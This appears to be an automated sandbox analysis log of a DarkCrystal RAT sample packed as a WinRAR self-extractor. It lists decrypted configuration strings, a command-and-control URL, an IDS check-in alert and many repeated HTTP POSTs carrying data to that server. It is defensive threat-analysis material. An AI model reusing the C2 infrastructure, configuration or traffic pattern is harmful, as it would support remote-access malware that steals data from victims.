                                    Source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-4vN0EXGexU6B21K1d7FI","0","VLADIK","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://891781cm.renyash.ru/","ProcessorServerdefaultsqltrafficuniversalwpprivate"]]
                                    Source: 1znAXdPcM5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: 1znAXdPcM5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 1znAXdPcM5.exe
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0058A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0058A69B
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0059C220
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Local\discordJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\LocalJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordllJump to behavior

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 104.21.38.84:80
                                    Source: Joe Sandbox ViewIP Address: 104.21.38.84 104.21.38.84
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1792Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 159884Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1784Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1756Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
